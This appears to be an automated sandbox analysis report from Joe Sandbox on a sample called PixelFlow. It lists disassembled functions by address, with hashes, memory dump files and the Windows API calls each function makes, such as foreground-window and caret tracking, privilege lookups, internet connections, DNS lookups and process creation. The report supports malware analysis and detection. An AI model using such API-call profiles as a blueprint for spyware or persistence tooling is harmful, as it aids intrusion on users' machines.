Opcode ID: fae3b94bf3785a9718f6cbb4acf3cde885f58a95c6304db12c64e68c7c283112
Instruction ID: 040e88753a17f4ecb9492ce4afb549bf0786ff50a7ec2c9080fdcc6515c81a17
Opcode Fuzzy Hash: fae3b94bf3785a9718f6cbb4acf3cde885f58a95c6304db12c64e68c7c283112
Instruction Fuzzy Hash: 30318F71A00256BFEB218F65C844AAABBBAFF41310F159129F8658B2A1D731D851DBD0

Function 006852F3 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00685307

Part of subcall function 006639A1: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006639BB
Part of subcall function 006639A1: GetCurrentThreadId.KERNEL32 ref: 006639C2
Part of subcall function 006639A1: AttachThreadInput.USER32(00000000,?,0066542D), ref: 006639C9

GetCaretPos.USER32(?), ref: 00685318
ClientToScreen.USER32(00000000,?), ref: 00685353
GetForegroundWindow.USER32 ref: 00685359

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 8ae562ac743bc0ce6c5f9376f85868d8499f7871b530a00ec949e4dff64f4da7
Instruction ID: 8a31f1f7f1a47bbedc46289060c0ef472425a3e095562875e144dccb44da643a
Opcode Fuzzy Hash: 8ae562ac743bc0ce6c5f9376f85868d8499f7871b530a00ec949e4dff64f4da7
Instruction Fuzzy Hash: 83318FB1D00108AFDB54EFA5DC819EFB7FEEF88304F10416AE505E7241EA71AE408BA4

Function 0068C8BB Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006029E2: GetWindowLongW.USER32(?,000000EB), ref: 006029F3

GetCursorPos.USER32(?), ref: 0068C8F5
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0063BC1C,?,?,?,?,?), ref: 0068C90A
GetCursorPos.USER32(?), ref: 0068C957
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0063BC1C,?,?,?), ref: 0068C991

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: af678ed2a92700e81cf06b3d56284ce6eb2c1e6581fb22277c1ea88e99bbfaa9
Instruction ID: 69db885efcc2cdc9261bde49987b69d43141730e7023f2b53ad86b6c9bfc3020
Opcode Fuzzy Hash: af678ed2a92700e81cf06b3d56284ce6eb2c1e6581fb22277c1ea88e99bbfaa9
Instruction Fuzzy Hash: 0B31CE35601118AFCF159F54C858EFA7BBAEF4A320F05429AF9058B261C7319D51EFB0

Function 00620AEB Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00620B0D

Part of subcall function 0061402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00667CBE,?,?,00000000), ref: 00614041
Part of subcall function 0061402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00667CBE,?,?,00000000,?,?), ref: 00614065

_fprintf.LIBCMT ref: 00620B44
OutputDebugStringW.KERNEL32(?), ref: 0065672F

Part of subcall function 00624BFA: _flsall.LIBCMT ref: 00624C13

__setmode.LIBCMT ref: 00620B79

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: be1e94385cd033631914f9fe6ee6a706910bc62efca4c5d580b11503474c316f
Instruction ID: 6e649801f093c379fee3e1975496703567037de4c305048f0cc272737d8b4665
Opcode Fuzzy Hash: be1e94385cd033631914f9fe6ee6a706910bc62efca4c5d580b11503474c316f
Instruction Fuzzy Hash: F9113272900A147EDB14B7B8EC02EFE7B6B9F45322F14015EF204972C2DE2548828BA8

Function 00659057 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00658B0B: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00658B22
Part of subcall function 00658B0B: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00658B2C
Part of subcall function 00658B0B: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00658B3B
Part of subcall function 00658B0B: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00658B42
Part of subcall function 00658B0B: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00658B58

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006590A4
_memcmp.LIBCMT ref: 006590C7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 006590FD
HeapFree.KERNEL32(00000000), ref: 00659104

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: c1bad9686f3c92048121589e8bd81e9711083082ff2fe614ce177703496aba9e
Instruction ID: 347ad282a883a4b06721b66a78301ce3166e7b1c88db9f40d218384ba94cf8eb
Opcode Fuzzy Hash: c1bad9686f3c92048121589e8bd81e9711083082ff2fe614ce177703496aba9e
Instruction Fuzzy Hash: 3D21A172E40109EFDB10DFA5C985BEEB7BAEF44316F04449DEC45A7281E731AA09CB60

Function 00671C17 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00671C53

Part of subcall function 00671CDD: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00671CFC
Part of subcall function 00671CDD: InternetCloseHandle.WININET(00000000), ref: 00671D99

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 84f6d39c399a19ba4a2567e3be8b71c02aacbb8d39ce59b2919993cccad05132
Instruction ID: 40486aec81db87ba259fcfe3075489766b92cc8eb6085fd8a01c09e758d76822
Opcode Fuzzy Hash: 84f6d39c399a19ba4a2567e3be8b71c02aacbb8d39ce59b2919993cccad05132
Instruction Fuzzy Hash: CC21D435280601BFEB129FA58D01FBAB7AFFF45710F10801FFA499AA50D775E8119B94

Function 00686116 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00686185
SetWindowLongW.USER32(?,000000EC,00000000), ref: 0068619F
SetWindowLongW.USER32(?,000000EC,00000000), ref: 006861AD
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 006861BB

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 6b40a361edc4292f6d5ada1f5746a0e73ef60a35f74a7967c067e810ee0f09fb
Instruction ID: 1ec7a2f420a8fa22d9bca95fa9e3e5ee109331732c00dc78686155abf773bbae
Opcode Fuzzy Hash: 6b40a361edc4292f6d5ada1f5746a0e73ef60a35f74a7967c067e810ee0f09fb
Instruction Fuzzy Hash: 5211BE35344514AFEB48AB18DC49FBF77AAAF85320F044219F916DB2D3CB60AD01CB94

Function 0065E23D Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0065F63B: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0065E252,?,?,?,0065F045,00000000,000000EF,00000119,?,?), ref: 0065F64A
Part of subcall function 0065F63B: lstrcpyW.KERNEL32(00000000,?), ref: 0065F670
Part of subcall function 0065F63B: lstrcmpiW.KERNEL32(00000000,?,0065E252,?,?,?,0065F045,00000000,000000EF,00000119,?,?), ref: 0065F6A1

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0065F045,00000000,000000EF,00000119,?,?,00000000), ref: 0065E26B
lstrcpyW.KERNEL32(00000000,?), ref: 0065E291
lstrcmpiW.KERNEL32(00000002,cdecl,?,0065F045,00000000,000000EF,00000119,?,?,00000000), ref: 0065E2C5

Strings

cdecl, xrefs: 0065E2BC

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 4efb3ca44f9a569d682b71d579466503e03d0a18dde81972e55134aeb484d7c1
Instruction ID: f639a0a22307bbd481087b8ad31e77b3574c5212b76bfe65936f5f5ea6c499c3
Opcode Fuzzy Hash: 4efb3ca44f9a569d682b71d579466503e03d0a18dde81972e55134aeb484d7c1
Instruction Fuzzy Hash: 9011BE76200305AFEF299F74D8459BA77AEFF45351F40402AFC06CB2A4EB729A45C794

Function 00635242 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00635261

Part of subcall function 0062586C: __FF_MSGBANNER.LIBCMT ref: 00625883
Part of subcall function 0062586C: __NMSG_WRITE.LIBCMT ref: 0062588A
Part of subcall function 0062586C: RtlAllocateHeap.NTDLL(00CD0000,00000000,00000001,?,?,?,?,00620F33,?,0000FFFF), ref: 006258AF

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: e9f86090574e777aa610188b3fe584a2dbd3576ed2b2127822ad3b038f595a78
Instruction ID: 68cfe3d1f783f61d45bf9a1d841f65327ec0578a064c03c9b00ac41b5d9cbb6d
Opcode Fuzzy Hash: e9f86090574e777aa610188b3fe584a2dbd3576ed2b2127822ad3b038f595a78
Instruction Fuzzy Hash: 2611A731506F326FCB613F70BC0569B379B9F15360F14452AF94697251DF348A418BD8

Function 006641D2 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006641F2
_memset.LIBCMT ref: 00664213
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00664265
CloseHandle.KERNEL32(00000000), ref: 0066426E

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: bed703572243f90cd2390849fb1f7b16bc92b6be9deae73147cb66a3d4c4bbaf
Instruction ID: 27c7678ba2fce986c61dd94155804fd459032382c6ae767262068fef45a083fc
Opcode Fuzzy Hash: bed703572243f90cd2390849fb1f7b16bc92b6be9deae73147cb66a3d4c4bbaf
Instruction Fuzzy Hash: AD11AB759012287AE7309BA5AC4DFEBBB7DEF45760F10429AF908D7190D6744F80CBA4

Function 00676819 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0061402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00667CBE,?,?,00000000), ref: 00614041
Part of subcall function 0061402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00667CBE,?,?,00000000,?,?), ref: 00614065

gethostbyname.WSOCK32(?,?,?), ref: 00676849
WSAGetLastError.WSOCK32(00000000), ref: 00676854
_memmove.LIBCMT ref: 00676881
inet_ntoa.WSOCK32(?), ref: 0067688C

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: dd18754a63f2bbf1074d99b3065b2a21d74ef85b2a0b31b26e0200c366f2f26f
Instruction ID: bcf535679fbc58de426c535c0daf830f4724caa0bbe4b316b881921903829542
Opcode Fuzzy Hash: dd18754a63f2bbf1074d99b3065b2a21d74ef85b2a0b31b26e0200c366f2f26f
Instruction Fuzzy Hash: D61166715001099FCB44FFA4DD46CEE77BAEF48311B148059F505A72A1DF319E44DBA5

Function 006594DC Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 006594FC
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0065950E
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00659524
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0065953F

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 439b32d98cef162f7e0cfddfd92983c27f1282e29c1e55a172c00c06dbc56c5b
Instruction ID: ef09d2c82736c1efd723bbd9d2997d4c2f01342b7c69cd2aa2bc5a18726f2dbc
Opcode Fuzzy Hash: 439b32d98cef162f7e0cfddfd92983c27f1282e29c1e55a172c00c06dbc56c5b
Instruction Fuzzy Hash: 22115E39900218FFEB11DF95CC84EDDBB79FB48310F204095EA04B7250D671AE25DBA4

Function 0060166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 006029E2: GetWindowLongW.USER32(?,000000EB), ref: 006029F3

DefDlgProcW.USER32(?,00000020,?), ref: 006016B4
GetClientRect.USER32(?,?), ref: 0063B86C
GetCursorPos.USER32(?), ref: 0063B876
ScreenToClient.USER32(?,?), ref: 0063B881

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 0f574c0a1541b3c4faf914c129a06027b0bde95fe6511887a6fe22507d47e7fd
Instruction ID: 92913d39a504b0c295473f42dffcb2207f7a0745103cba26b0133ddf95c9ffe7
Opcode Fuzzy Hash: 0f574c0a1541b3c4faf914c129a06027b0bde95fe6511887a6fe22507d47e7fd
Instruction Fuzzy Hash: C5110275A10119AFDB04EF98C89A9BE77BAEB06300F14045AF911EB290C731AA518BA5

Function 00602111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0060214F
GetStockObject.GDI32(00000011), ref: 00602163
SendMessageW.USER32(00000000,00000030,00000000), ref: 0060216D

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: ecfdf692d7c865b225304f8f4d2c762f1efef68c9b1e2bfe5b9c55b8f67247cf
Instruction ID: 8b4b87e0a52102aaf4c0c02a60ada0a619da46a993f77eae25cdbef509dab4de
Opcode Fuzzy Hash: ecfdf692d7c865b225304f8f4d2c762f1efef68c9b1e2bfe5b9c55b8f67247cf
Instruction Fuzzy Hash: 1611AD7214114ABFEF064F90DC58EEBBB6EEF59364F040146FB0452190C731DC61ABA0

Function 006617AD Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00660358,?,006613AB,?,00008000), ref: 006617CA
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00660358,?,006613AB,?,00008000), ref: 006617EF
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00660358,?,006613AB,?,00008000), ref: 006617F9
Sleep.KERNEL32(?,?,?,?,?,?,?,00660358,?,006613AB,?,00008000), ref: 0066182C

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: b4410e40b14cf2d6415ec67584c1be1498607334fbc2165368d76e916d78453c
Instruction ID: d9ea3b03d9514d482a2b2e06c0a9344731b06ac6bb7e6809646dbc9683a1dbf9
Opcode Fuzzy Hash: b4410e40b14cf2d6415ec67584c1be1498607334fbc2165368d76e916d78453c
Instruction Fuzzy Hash: 8C112E31D01518DBDF009FE4D9846EEBF7AFF09711F45405AD941B6240CB349551CBD5

Function 00637117 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0063713B

Part of subcall function 00637822: __fltout2.LIBCMT ref: 0063784B

__cftog_l.LIBCMT ref: 00637161
__cftoe_l.LIBCMT ref: 00637193

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: a81578354ff2c7407400766b6f5891a50a4f31e6f038ce250e97cc7ec84e8db0
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 07013DB344414ABBCF625E84CC058EE3F27BB29355F588419FA1858221D236CAB2BBC1

Function 0068B6B2 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0068B6D1
ScreenToClient.USER32(?,?), ref: 0068B6E9
ScreenToClient.USER32(?,?), ref: 0068B70D
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0068B728

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 5e3ba6e599cece20b111913ddc9f727ea231f82e03fc9d935b58e6e13ee2652b
Instruction ID: 5772ce092268282344a15bfcdd0a44654620f9ff468b0cfaec47d7d63e389867
Opcode Fuzzy Hash: 5e3ba6e599cece20b111913ddc9f727ea231f82e03fc9d935b58e6e13ee2652b
Instruction Fuzzy Hash: 6D1132B9D00209EFDB41DF98C8849EEBBB9FB48310F105156E915E2610D735AA658F50

Function 0068BA22 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0068BA31
_memset.LIBCMT ref: 0068BA40
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,006C7F20,006C7F64), ref: 0068BA6F
CloseHandle.KERNEL32 ref: 0068BA81

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

